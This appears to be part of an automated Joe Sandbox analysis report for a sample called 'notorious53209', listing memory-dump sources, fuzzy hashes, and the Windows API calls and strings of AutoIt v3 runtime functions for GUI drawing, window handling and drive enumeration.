                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                            • String ID:
                                            • API String ID: 2797419724-0
                                            • Opcode ID: 6f7eddd54cc7cb8b166b52d8b9e870dbdacac9afd24b8fc1f2eef28114d89c76
                                            • Instruction ID: 23b8f56e42b8e2daa0155a7d80e64efba96f30309d0883967eba9e3e4c535d9f
                                            • Opcode Fuzzy Hash: 6f7eddd54cc7cb8b166b52d8b9e870dbdacac9afd24b8fc1f2eef28114d89c76
                                            • Instruction Fuzzy Hash: E7D01270150318B7DA203B50DD1BF597A1DDB14750F408020BB05291D3CA717835A958
                                            APIs
                                            • GetUserNameW.ADVAPI32(?,?), ref: 00272242
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: d7f3fb20ad55ae3cb9bae9652823cdd0c0ff63ddae530849f15a8091b6ea08c0
                                            • Instruction ID: 6af26b34bff2a5387a4d78227959ca00e39ea9a81421dab067c7ab9d97c5982c
                                            • Opcode Fuzzy Hash: d7f3fb20ad55ae3cb9bae9652823cdd0c0ff63ddae530849f15a8091b6ea08c0
                                            • Instruction Fuzzy Hash: 33C04CF1810109DBDB05DB90DA88DEE77BCAB04304F104555A105F2150D7749B548B71
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0025A36A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 2fcf02db8cc504e51126dcd662e34de9a2b7b03addb260806afa0946ac2afcb0
                                            • Instruction ID: 3162b6ebd9a13cc1817ab6cb13e897dcd0d2031a8cd4ec39aaafd9b6a7fe038c
                                            • Opcode Fuzzy Hash: 2fcf02db8cc504e51126dcd662e34de9a2b7b03addb260806afa0946ac2afcb0
                                            • Instruction Fuzzy Hash: 1EA0113000020CAB8A002B82FC08888BFACEA002A0B0080A0FE0E800228B32A8208A80
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc74b3226b2100abb2c8ff3cde101bba765143efdd45423e900a43b7b374f93c
                                            • Instruction ID: a55ed087fbedd4f777f7362e5bbed0e17bb1c148f48e017faad711d6399d3cde
                                            • Opcode Fuzzy Hash: fc74b3226b2100abb2c8ff3cde101bba765143efdd45423e900a43b7b374f93c
                                            • Instruction Fuzzy Hash: 03224634932667CBDF2C9F24C4D467DB7A1EB01304F28846BD9428B2E1EB749DA1DB61
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction ID: 988feb91b2590ccaeda15919f3ce66bcdc32f14ff1ae6fe412db9be3c6177326
                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction Fuzzy Hash: 74C1823222919349DB2D8A39947413EBAE15AA37B331A075DECB2DB5C4EF30D53CD624
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction ID: c42c6f7f07730dd7078900b3ef9dbb41742ddda3a059fa4fe33c76e7861a889e
                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction Fuzzy Hash: 90C1923222919349DB2D4A39943413EBBE15BA37B231A076DECB2DB5C5EF30D53C9624
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 002B38AF
                                            • IsWindowVisible.USER32(?), ref: 002B38D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BuffCharUpperVisibleWindow
                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                            • API String ID: 4105515805-45149045
                                            • Opcode ID: 2f04deaad1d588835f92be703de15caa86c9a91bc628f663776e8459b6a74c62
                                            • Instruction ID: c90b00b60ebd42cca419f20e2b547449660424d145ed77f0ff8afe3172a2b064
                                            • Opcode Fuzzy Hash: 2f04deaad1d588835f92be703de15caa86c9a91bc628f663776e8459b6a74c62
                                            • Instruction Fuzzy Hash: C9D1B234234306DBCB15EF14C991AAABBA5EF54384F144458BC865B3E2CB71EE6ACF41
                                            APIs
                                            • SetTextColor.GDI32(?,00000000), ref: 002BA89F
                                            • GetSysColorBrush.USER32(0000000F), ref: 002BA8D0
                                            • GetSysColor.USER32(0000000F), ref: 002BA8DC
                                            • SetBkColor.GDI32(?,000000FF), ref: 002BA8F6
                                            • SelectObject.GDI32(?,?), ref: 002BA905
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 002BA930
                                            • GetSysColor.USER32(00000010), ref: 002BA938
                                            • CreateSolidBrush.GDI32(00000000), ref: 002BA93F
                                            • FrameRect.USER32(?,?,00000000), ref: 002BA94E
                                            • DeleteObject.GDI32(00000000), ref: 002BA955
                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 002BA9A0
                                            • FillRect.USER32(?,?,?), ref: 002BA9D2
                                            • GetWindowLongW.USER32(?,000000F0), ref: 002BA9FD
                                              • Part of subcall function 002BAB60: GetSysColor.USER32(00000012), ref: 002BAB99
                                              • Part of subcall function 002BAB60: SetTextColor.GDI32(?,?), ref: 002BAB9D
                                              • Part of subcall function 002BAB60: GetSysColorBrush.USER32(0000000F), ref: 002BABB3
                                              • Part of subcall function 002BAB60: GetSysColor.USER32(0000000F), ref: 002BABBE
                                              • Part of subcall function 002BAB60: GetSysColor.USER32(00000011), ref: 002BABDB
                                              • Part of subcall function 002BAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002BABE9
                                              • Part of subcall function 002BAB60: SelectObject.GDI32(?,00000000), ref: 002BABFA
                                              • Part of subcall function 002BAB60: SetBkColor.GDI32(?,00000000), ref: 002BAC03
                                              • Part of subcall function 002BAB60: SelectObject.GDI32(?,?), ref: 002BAC10
                                              • Part of subcall function 002BAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 002BAC2F
                                              • Part of subcall function 002BAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002BAC46
                                              • Part of subcall function 002BAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 002BAC5B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                            • String ID:
                                            • API String ID: 4124339563-0
                                            • Opcode ID: b162325a755b6c6c65c3d04b2fb6e921cda8a01374b0bf3a7e8c7fce42dc92a2
                                            • Instruction ID: d0b968df9c3c6ed6ef4e82967669699a09594409801c67482acccf59eebc92a8
                                            • Opcode Fuzzy Hash: b162325a755b6c6c65c3d04b2fb6e921cda8a01374b0bf3a7e8c7fce42dc92a2
                                            • Instruction Fuzzy Hash: EAA18F72018301BFD7509F68ED0CAAB7BA9FF88361F104B29F9A6961A1D771D844CF52
                                            APIs
                                            • DestroyWindow.USER32(00000000), ref: 002A77F1
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002A78B0
                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002A78EE
                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002A7900
                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002A7946
                                            • GetClientRect.USER32(00000000,?), ref: 002A7952
                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002A7996
                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002A79A5
                                            • GetStockObject.GDI32(00000011), ref: 002A79B5
                                            • SelectObject.GDI32(00000000,00000000), ref: 002A79B9
                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 002A79C9
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A79D2
                                            • DeleteDC.GDI32(00000000), ref: 002A79DB
                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002A7A07
                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 002A7A1E
                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002A7A59
                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002A7A6D
                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 002A7A7E
                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002A7AAE
                                            • GetStockObject.GDI32(00000011), ref: 002A7AB9
                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002A7AC4
                                            • ShowWindow.USER32(00000004), ref: 002A7ACE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                            • API String ID: 2910397461-517079104
                                            • Opcode ID: dce2a19a0fe595936070c6feee0182af32693b7b6d7309a79d7230925daf4a05
                                            • Instruction ID: 2780d7e37bdd2268f3a1befb659bc65f9d59c1d30373a50d6797771960d2a356
                                            • Opcode Fuzzy Hash: dce2a19a0fe595936070c6feee0182af32693b7b6d7309a79d7230925daf4a05
                                            • Instruction Fuzzy Hash: B4A160B1A50205BFEB149B68ED4EFAA7BB9EB45710F004614FA14A72E0CB74AD10DB64
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0029AF89
                                            • GetDriveTypeW.KERNEL32(?,002BFAC0,?,\\.\,002BF910), ref: 0029B066
                                            • SetErrorMode.KERNEL32(00000000,002BFAC0,?,\\.\,002BF910), ref: 0029B1C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DriveType
                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                            • API String ID: 2907320926-4222207086
                                            • Opcode ID: 60a6535d29e3156c71d83094009ba5e059de7b1ab7ecf650331236b891836179
                                            • Instruction ID: c301568de095a5e1a1997fa1910aeff9f958e45aa68c3d94d15dcf8dc683a3b0
                                            • Opcode Fuzzy Hash: 60a6535d29e3156c71d83094009ba5e059de7b1ab7ecf650331236b891836179
                                            • Instruction Fuzzy Hash: 6A51C0706F0345ABCF05EF15EF929BDB3B0AB1A341B604016E40EA7290C7B5AD71DB52
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                            • API String ID: 1038674560-86951937
                                            • Opcode ID: efd03d639d80da6f60477264347c72d875e68d312dc598c55346b382e1710f1b
                                            • Instruction ID: de98dd4a313d44cf1ba0fcd2193945005d74003964cf5946b5089ff8da04aad3
                                            • Opcode Fuzzy Hash: efd03d639d80da6f60477264347c72d875e68d312dc598c55346b382e1710f1b
                                            • Instruction Fuzzy Hash: 16814CF0670202BACF21AF60CD86FBAB75CAF15745F048025FD45AA1C2EB70DA75CA95
                                            APIs
                                            • DestroyWindow.USER32 ref: 00232CA2
                                            • DeleteObject.GDI32(00000000), ref: 00232CE8
                                            • DeleteObject.GDI32(00000000), ref: 00232CF3
                                            • DestroyCursor.USER32(00000000), ref: 00232CFE
                                            • DestroyWindow.USER32(00000000), ref: 00232D09
                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0026C68B
                                            • 69E7E349.COMCTL32(?,000000FF,?), ref: 0026C6C4
                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0026CAED
                                              • Part of subcall function 00231B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00231B9A
                                            • SendMessageW.USER32(?,00001053), ref: 0026CB2A
                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0026CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DestroyMessageSendWindow$DeleteObject$CursorE349InvalidateMoveRect
                                            • String ID: 0
                                            • API String ID: 2631842597-4108050209
                                            • Opcode ID: 67710f9ac64ebe9a426abc246990b2227bdc930acc624d19be32448fb19b4c53
                                            • Instruction ID: ad30477780f7d4a3f65711a0a61ce6d8b30e7490ea6c722241302e31554edc3a
                                            • Opcode Fuzzy Hash: 67710f9ac64ebe9a426abc246990b2227bdc930acc624d19be32448fb19b4c53
                                            • Instruction Fuzzy Hash: 3B12A270520202EFDB25EF24C988BB9B7E5BF45310F64456AE495DB262C731ECA5CF90
                                            APIs
                                            • GetSysColor.USER32(00000012), ref: 002BAB99
                                            • SetTextColor.GDI32(?,?), ref: 002BAB9D
                                            • GetSysColorBrush.USER32(0000000F), ref: 002BABB3
                                            • GetSysColor.USER32(0000000F), ref: 002BABBE
                                            • CreateSolidBrush.GDI32(?), ref: 002BABC3
                                            • GetSysColor.USER32(00000011), ref: 002BABDB
                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002BABE9
                                            • SelectObject.GDI32(?,00000000), ref: 002BABFA
                                            • SetBkColor.GDI32(?,00000000), ref: 002BAC03
                                            • SelectObject.GDI32(?,?), ref: 002BAC10
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 002BAC2F
                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002BAC46
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 002BAC5B
                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002BACA7
                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002BACCE
                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 002BACEC
                                            • DrawFocusRect.USER32(?,?), ref: 002BACF7
                                            • GetSysColor.USER32(00000011), ref: 002BAD05
                                            • SetTextColor.GDI32(?,00000000), ref: 002BAD0D
                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002BAD21
                                            • SelectObject.GDI32(?,002BA869), ref: 002BAD38
                                            • DeleteObject.GDI32(?), ref: 002BAD43
                                            • SelectObject.GDI32(?,?), ref: 002BAD49
                                            • DeleteObject.GDI32(?), ref: 002BAD4E
                                            • SetTextColor.GDI32(?,?), ref: 002BAD54
                                            • SetBkColor.GDI32(?,?), ref: 002BAD5E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                            • String ID:
                                            • API String ID: 1996641542-0
